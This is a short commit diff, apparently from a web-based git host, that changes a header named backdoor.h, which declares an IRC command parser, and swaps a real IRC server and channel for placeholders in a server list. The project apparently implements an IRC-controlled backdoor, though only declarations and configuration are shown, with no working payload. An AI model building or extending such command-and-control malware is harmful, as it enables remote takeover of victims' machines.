updated
This commit is contained in:
parent
77d2f3cc76
commit
69bc238a38
4 changed files with 5 additions and 5 deletions
|
@ -2,7 +2,7 @@
|
|||
#define _BACKDOOR_H
|
||||
#include "irc.h"
|
||||
|
||||
#define COMMON_BUF_SIZE 200
|
||||
#define COMMON_BUF_SIZE 100
|
||||
|
||||
void backdoor_offline(void);
|
||||
void parse_cmd(IRCC_client *client);
|
||||
|
|
|
@ -9,5 +9,5 @@ typedef struct {
|
|||
} SERVER;
|
||||
|
||||
SERVER servers[] = {
|
||||
{1, "irc.rizon.net", 6697, NULL, "#blbl", NULL}
|
||||
{1, "irc.ipv4.server", 6697, NULL, "#channel", NULL}
|
||||
};
|
||||
|
|
Loading…
Add table
Add a link
Reference in a new issue